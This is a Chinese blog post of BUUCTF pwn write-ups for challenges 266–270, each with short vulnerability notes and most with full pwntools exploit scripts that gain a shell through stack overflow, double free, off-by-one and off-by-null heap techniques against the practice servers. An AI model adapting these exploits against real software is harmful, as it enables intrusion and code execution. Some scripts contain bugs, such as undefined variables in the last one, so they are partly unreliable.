buuoj Pwn writeup 266-270

最新推荐文章于 2023-08-20 17:51:05 发布
最新推荐文章于 2023-08-20 17:51:05 发布
阅读量194 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/119737825
版权

266 pwnable_silverbullet

在这里插入图片描述create
在这里插入图片描述创造个什么武器,然后武器描述,然后长度是它的什么power。

power_up
在这里插入图片描述
那么显然我刚刚如果通过’\x00’的截断,power整成0,那么我这里可以直接溢出。

beat
在这里插入图片描述
exp

from pwn import *
context.log_level = "debug"

r = remote('node4.buuoj.cn',25942)

libc = ELF('./32/libc-2.23.so')
elf = ELF('./266')

main = 0x8048954

def create(des):
    r.sendlineafter("Your choice :",'1')
    r.sendafter("Give me your description of bullet :",des)

def power(des):
    r.sendlineafter("Your choice :",'2')
    r.sendafter("bullet :",des)

def beat():
    r.sendlineafter("Your choice :",'3')


puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

create('A'*0x20)
power('B'*0x10)
power(p32(0x7FFFFFFF)+"A"*3+p32(puts_plt)+p32(main)+p32(puts_got))
beat()

r.recvuntil('Oh ! You win !!\n')

puts = u32(r.recvuntil('\n',drop=True).ljust(4,'\x00'))
libc_base = puts - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
bin_sh = libc_base + libc.search('/bin/sh').next()
print "libc_base = " + hex(libc_base)

create('A'*0x20)
power('B'*0x10)
power(p32(0x7FFFFFFF)+"A"*3+p32(system_addr)+p32(main)+p32(bin_sh))
beat()

r.interactive()

267 qwb2018_slient2

在这里插入图片描述确实是比较沉默吧,一点输出没有。

add
在这里插入图片描述size意思是当小于0x7f的时候一定要是16,那我大于不就好了……

然后那个400836是输入函数。

经检验呢是没啥问题。
在这里插入图片描述
free
在这里插入图片描述free这块呢确实是有个uaf。

所以非常简单,got表也可以写,然后也有system函数。

exp

from pwn import *
context(os='linux', arch='amd64',log_level='debug')
r = remote("node4.buuoj.cn",29830)

elf=ELF("./267")

system_plt=elf.plt['system']
free_got=elf.got['free']


def create(size,content):
	sleep(0.2)
	r.sendline('1')
	sleep(0.2)
	r.sendline(str(size))
	sleep(0.2)
	r.sendline(content)

def delete(index):
	sleep(0.2)
	r.sendline('2')
	sleep(0.2)
	r.sendline(str(index))
	
create(0x80,'aaaaa')
create(0x80,'/bin/sh\x00')
delete(0)
delete(0)
create(0x80,p64(free_got)+'\x00')
create(0x80,'aaaa')
create(0x80,p64(system_plt))
delete(1)
r.interactive()

268 suctf2018_heap

在这里插入图片描述add
在这里插入图片描述
申请两个chunk,大小固定。

del
在这里插入图片描述并没有啥问题。

show
在这里插入图片描述输出也正常、

edit
在这里插入图片描述strlen可以造成off by one的溢出。

所以我们就off by one一套带走就好。

exp

from pwn import *

context,log_level = "debug"

p=remote('node4.buuoj.cn',25766)
elf=ELF('./268')
libc=ELF("./64/libc-2.27.so")
def add(size,content):
    p.sendlineafter('edit','1')
    p.sendlineafter('len',str(size))
    p.sendafter('data',content)

def delete(idx):
    p.sendlineafter('edit','2')
    p.sendlineafter('id',str(idx))

def show(idx):
    p.sendlineafter('edit','3')
    p.sendlineafter('id',str(idx))

def edit(idx,content):
    p.sendlineafter('edit','4')
    p.sendlineafter('id',str(idx))
    p.sendafter('data',content)

add(0x88,'a'*0x88)
add(0x88,'\x11'*0x88)
add(0x88,'\x12'*0x88)
edit(0,'b'*0x88+'\xc1')
edit(2,'\x11'*0x20+p64(0)+p64(0x61))
delete(2)
delete(1)
add(0xb0,'\x52'*0x88+p64(0x91)+p64(0x6020C0-0x10))
add(0x88,'d'*0x20)
add(0x88,'\x11'*0x88)
edit(2,p64(0)*2+p64(elf.got['atoi']))
show(0)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['atoi']
system=libcbase+libc.sym['system']
edit(0,p64(system))
sleep(1)
p.sendline('sh')
#add(0x88,'/bin/sh\x00')
#show(2)
p.interactive()

269 pwnable_otp

在这里插入图片描述
在这里插入图片描述size_t fwrite(const void *ptr, size_t size, size_t nmemb, FILE *stream) 把 ptr 所指向的数组中的数据写入到给定流 stream 中
size_t fread(void *ptr, size_t size, size_t nmemb, FILE *stream) 从给定流 stream 读取数据到 ptr 所指向的数组中
unsigned long int strtoul(const char *str, char **endptr, int base) 把参数 str 所指向的字符串根据给定的 base 转换为一个无符号长整数(类型为 unsigned long int 型),base 必须介于 2 和 36(包含)之间,或者是特殊值 0。

所以我们发现上面一段程序的逻辑就是
随机开一个文件,v6输进去,然后再输出出来,然后通过命令行传参,比较,相同,就行了。

问题在哪,在fread他没有检测到底有没有读取成功,如果没读取成功会发生啥,如果没有读取成功,ptr始终是0,那么我们v4直接传入0就好啦。

那咋就能让我们不能读取成功,看大佬博客说有个 ulimit命令。

ulimit命令用来限制系统用户对shell资源的访问。

所以我们限制shell所能创建的最大文件为0。

在这里插入图片描述

270 qctf_2018_babyheap

在这里插入图片描述
add
在这里插入图片描述逻辑简单。

在这里插入图片描述
显然有个off by null。

free
在这里插入图片描述干干净净

show
在这里插入图片描述常规显示。

所以说白了就是house of ein解决问题。

exp

from pwn import *

r = remote("node4.buuoj.cn", 26026)

def create(size,pay):
	r.recvuntil('Your choice :')
	r.sendline('1')
	r.recvuntil('Size:')
	r.sendline(str(size))
	r.recvuntil('Data:')
	r.send(pay)

def delete(idx):
	r.recvuntil('Your choice :')
	r.sendline('2')
	r.recvuntil('Index')
	r.sendline(str(idx))
def show():
        r.recvuntil('Your choice :')
        r.sendline('3')

create(0x100-8,'A'*0x20+'\n')#0
create(0x650-8,'B'*0x5f0+p64(0x600)+p64(0x50)+'\n')#1
create(0x500,'C'*0x20+'\n')#2
create(0x100,'D'*0x20+'\n')#3
delete(0)
delete(1)
create(0x100-8,'A'*0xf8+'\n')#0
create(0x500-8,'E'*0x10+'\n')#1
create(0x100-8,'F'*0x10+'\n')#4
delete(1)
delete(2)
create(0x500-8,'G'*0x10+'\n')#1

show()
r.recvuntil('4 : ')
libc_base = u64(s.recv(6)+'\x00'*2)-0x3ebca0

create(0x100-8,'H'*0x10+'\n')#2
delete(4)
delete(2)
create(0x100-8,p64(libc+0x3ED8E8)+'\n')
create(0x100-8,p64(libc+0x3ed8e8)+'\n')
create(0x100-8,p64(libc+0x4F440)+'\n')
create(0x200-8,'/bin/sh\x00'+'\n')#6
delete(6)

r.interactive()
yongbaoii
关注
专栏目录
BUUCTF qwb2018_slient2
weixin_45966329的博客
03-06 216
BUUCTF qwb2018_slient2 1、该题在BUUCTF上的环境是2.27版本,所以相对来说更加的容易了 2、只需要利用double free 使用tcache attach攻击free函数的got表的地址 3、然后在free的got表中写入sysytem函数的plt表地址 4、再free掉一个写入/bin/sh的chunk即可 from pwn import * context(os='linux', arch='amd64',log_level='debug') io=remote("nod
python类逆向总结
最新发布
woshiyanfu的博客
09-28 1966
Python是解释型语言,没有严格意义上的编译和汇编过程。但是一般可以认为编写好的python源文件,由python解释器翻译成以.pyc为结尾的字节码文件。pyc文件是二进制文件,可以由python虚拟机直接运行。Python在执行import语句时,将会到已设定的path中寻找对应的模块。并且把对应的模块编译成相应的PyCodeObject中间结果,然后创建pyc文件,并将中间结果写入该文件。
SUCTF 2018 招新赛之Misc篇刷题记录(14)
Aluxian_的博客
08-20 331
【代码】NSSCTF之Misc篇刷题记录(14)
suctf2018_heap
doudoudedi
02-27 377
suctf2018_heap 这道题会一次性申请2个相同大小的chunk做的时候有点逻辑混乱深深的怀疑本来是ubuntu16的环境… 思路 : off by one打成堆重叠写到指针段写atoi为system拿shell exp: from pwn import * #p=process('./offbyone') p=remote('node3.buuoj.cn',26238) elf=ELF(...
2018 SUCTF招新赛
qq_42192672的博客
11-15 1770
PWN 1.stack checksec一波 什么保护都没开,可还行,IDA找一波漏洞 read函数百分之百溢出 我们看到了我们喜爱的 改一下rip美滋滋 exp #coding=utf8 from pwn import * context.log_level = 'debug' context.terminal = ['gnome-terminal','-x','b...
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 372
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 631
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2528
初学pwn-writeUp BUUCTF平台的一道题目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
初学pwn-攻防世界(level0)
天柱的博客
08-27 1015
初学pwn-writeUp 攻防世界的第三道题目,level0。 首先还是先创建场景,使用nc进入远端,发现输出了一个Hello,World,之后什么都没有了,使用ls也没有反应,说明这需要我们获取shell了。 下载文件,先用checksec查看一下 这里简单介绍一些checksec这个工具: 1、Relro:No Relro(重定位表只读)   Relocation Read Only, 重定位表只读。重定位表即.got 和 .plt 两个表。   RELRO会有No RELRO、Partial RE
2021-09-20 BUUCTF WriteUP(堆/字符串/栈)
m0_56897090的博客
09-20 622
文章目录堆类综合模型总结pwnable_hacknote分析EXPhitcontraining_bamboobox分析EXPnpuctf_2020_easyheap分析EXPciscn_2019_es_1分析EXPhitcontraining_unlink分析EXPgyctf_2020_some_thing_exceting分析EXP栈溢出综合模型总结picoctf_2018_shellcode分析EXPjarvisoj_level5分析EXPcmcc_pwnme2分析EXPactf_2019_babyst
2018年强网杯之silent2
极目楚天舒的博客
04-23 662
0x01分析行为按照正常思路添加、编辑、释放Add函数分配大小为16字节或大于0x7f字节的堆块,将堆地址放入0x6020c0的bss段内。Free函数释放堆块,但是没有将指针清零,导致doublefree。Edit函数修改堆块内容,修改长度不超过原来的长度。0x02利用点checksec检查发现可以对got表进行写,很自然联想到用system函数地址覆盖strlen_got_plt,这样当调用E...
2018强网杯silent2
snowleopard_bin的博客
09-26 612
看了雪论坛里一位大佬的writeup,感到一丝迷茫,遂另起炉灶,提供另一种类似的做法,我多加了解释,应该会更加通俗易懂。 发现NX、Canary都开了,但Partial RELRO说明可以修改got表,PIE说明没有地址随机化,就可以直接利用IDA中看到的地址,不需要计算libc偏移了 先看main函数 case1:功能就是create啦 注意到*&s[8*i] = v...
2018强网杯部分writeup
snowleopard_bin的博客
09-20 2458
0x00 签到题 操作内容: 打开题目就看到flag FLAG值: flag{welcome_to_qwb} 0x01 Welcome 操作内容: |拿到一张图片:               放进Stegsolve中,一点点偏移图片,慢慢发现有字,offset到100时就能清楚看到 得到flag FLAG值: QWB{W3lc0me} 0x02 web签到 操作内容:...
[SUCTF 2019]Pythonginx
Yang_99的博客
08-17 822
1.2019black hat一个议题 PPT:https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf 这也就是说我们传入的url为http://evil.c℀.com在经过上述处理过后便成为了http://evil.ca/c.com 在unicode中字符℀(U+2100),当IDNA处理此字符时,会将℀变成a/c,因此当你访问此ur
python 第一个程序 hello python
笑望灬星辰
05-14 604
python hello python # 结尾分号可有可无 print("hello python"); def sayHelloTOPython0(): print("hello python"); def sayHelloTOPython1( str): print(str); sayHelloTOPython0(); sayHelloTOPython1("hello python");
QCTF 2018xman夏令营选拔赛
Xi4or0uji
07-15 2196
小肉鸡太菜了,就只做了三题orz....... x-man-a-face 这题挺简单的,拿到一个图片,看见有个二维码 发现少了两个定位点,用photoshop补全 扫一下就出来一串KFBVIRT3KBZGK5DUPFPVG2LTORSXEX2XNBXV6QTVPFZV6TLFL5GG6YTTORSXE7I= 然后base32解码就行了 Lottery 这题是弱类型匹配,进...
QCTF2018 Misc - X-man-Keyword writeup
xuchen16的博客
07-17 1577
转载自:http://www.cnblogs.com/semishigure/p/9318258.html 一张图片,上 Stegsolve ,发现图片开头 lsb 里有些东西。 用 lsb 解密脚本 , 可以得到: PVSF{vVckHejqBOVX9C1c13GFfkHJrjIQeMwf} 根据题目提示,尝试了一下,发现是 Nihilist 密码 。 简单说一下原理 原...
pwnable.tw silver_bullet
weixin_30361641的博客
03-30 170
产生漏洞的原因 int __cdecl power_up(char *dest) { char s; // [esp+0h] [ebp-34h] size_t new_len; // [esp+30h] [ebp-4h] new_len = 0; memset(&s, 0, 0x30u); if ( !*dest ) return put...
[QCTF2018]babyre
qq_37439229的博客
05-07 608
一道一般般的题。。。 打开ida,调试到这里 发现长度为0x20,于是输入“ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^-`” 第一个函数 打乱我的输入顺序,第二个函数从第三个数开始,每四个为一组分别加一些数,第三个函数从第9个开始,每四个一组进行一些位运算 写出脚步 flag=[0xda,0xd8,0x3d,0x4c,0xe3,0x63,0x97,0x3d,0xc1,0x91,...
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值